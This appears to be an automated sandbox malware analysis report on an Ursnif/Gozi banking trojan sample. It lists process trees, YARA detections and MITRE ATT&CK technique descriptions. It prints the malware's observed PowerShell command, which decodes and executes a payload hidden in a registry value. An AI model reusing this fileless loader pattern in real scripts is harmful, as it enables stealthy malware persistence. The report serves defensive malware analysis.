Imagebase:	0x7ff6e9d40000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: powershell.exe PID: 6388 Parent PID: 4220

General

Start time:	19:45:28
Start date:	26/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Imagebase:	0x7ff7e3240000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, Author: CCN-CERT
Reputation:	high

Analysis Process: conhost.exe PID: 5064 Parent PID: 6388

General

Start time:	19:45:29
Start date:	26/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: csc.exe PID: 6220 Parent PID: 6388

General

Start time:	19:45:36
Start date:	26/01/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline'
Imagebase:	0x7ff6481c0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Analysis Process: cvtres.exe PID: 5132 Parent PID: 6220

General

Start time:	19:45:37
Start date:	26/01/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES3C64.tmp' 'c:\Users\user\AppData\Local\Temp\oywbpzxb\CSC2DF1E538346248FC93F32E43C7FD9A69.TMP'
Imagebase:	0x7ff7c8840000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: csc.exe PID: 6016 Parent PID: 6388

General

Start time:	19:45:41
Start date:	26/01/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.cmdline'
Imagebase:	0x7ff6481c0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Analysis Process: cvtres.exe PID: 5856 Parent PID: 6016

General

Start time:	19:45:42
Start date:	26/01/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES4E84.tmp' 'c:\Users\user\AppData\Local\Temp\augdh01w\CSCB69F8509801B4EEB877EE395DFB169E8.TMP'
Imagebase:	0x7ff7c8840000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: control.exe PID: 5824 Parent PID: 4496

General

Start time:	19:45:46
Start date:	26/01/2021
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff6d37b0000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exe PID: 5312 Parent PID: 5824

General

Start time:	19:45:50
Start date:	26/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff6c98a0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report sup11_dump.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Exports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre